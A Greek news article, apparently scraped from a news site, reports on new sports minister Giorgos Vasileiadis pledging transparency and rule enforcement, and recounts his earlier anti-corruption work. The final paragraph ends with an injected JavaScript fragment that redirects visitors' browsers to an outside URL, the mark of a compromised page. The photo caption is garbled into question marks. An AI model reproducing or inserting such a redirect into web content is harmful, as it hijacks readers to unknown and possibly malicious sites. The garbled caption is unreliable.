Βασιλειάδης: Υπάρχουν κανόνες και όλοι θα πρέπει να παίξουν με αυτούς

0
9
HAm o e?? ????????????? ???? ?? .(EUROKINISSI-??M? KOMd?)

 

Αμέσως μετά την ολοκλήρωση της τελετής ορκωμοσίας ο νέος υπουργός Αθλητισμού Γιώργος Βασιλειάδης τόνισε πως ακολουθώ έπειτα από έναν υποργό που σημείωσε σημαντικό έργο στην καταπολέμηση της διαφθοράς και θα συνεχίσουμε έτσι.

Νωρίτερα, σε δηλώσεις του στο Αθηναϊκό Πρακτορείο ο. Βασιλειάδης απέστειλε σαφές μήνυμα: «Υπάρχουν κανόνες και όλοι θα πρέπει να παίξουν με αυτούς, όσο ισχυροί κι αν είναι».

Ο 39χρονος «αδιάφθορος», όπως τον αποκαλούν μετά την πετυχημένη του πορεία στο υπουργείο Δικαιοσύνης, ανέλαβε το χαρτοφυλάκιο του αθλητισμού, έχει τεράστια εμπειρία σε θέματα διαφθοράς.

Ο κ. Βασιλειάδης διαδέχθηκε τον Σταύρο Κοντονή, που είναι ο νέος Υπουργός Δικαιοσύνης, και ξεκαθάρισε ότι σκοπός του είναι η «απόλυτη διαφάνεια και η κάθαρση», ενώ σημείωσε ότι «δεν φοβόμαστε να συγκρουστούμε με κανένα, αλλά δεν θα είμαστε από την αρχή σε συγκρουσιακή τροχιά», και υπενθύμισε προς κάθε κατεύθυνση ότι «με αυτή την κυβέρνηση οι κανόνες εφαρμόζονται και θα εφαρμοστούν».

Αν το παρελθόν αποτελεί οδηγό για το μέλλον, ο Γιώργος Βασιλειάδης, μάχιμος δικηγόρος, ως επικεφαλής της Γενικής Γραμματείας διαφθοράς, συνέβαλε στην αντιμετώπιση των φαινομένων διαφθοράς, με σταθμό τη συνεργασία με το γερμανικό κρατίδιο Βεστφαλίας – Ρηνανίας, προκειμένου να φτάσει στις ελληνικές αρχές η λίστα Μπόργιανς. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here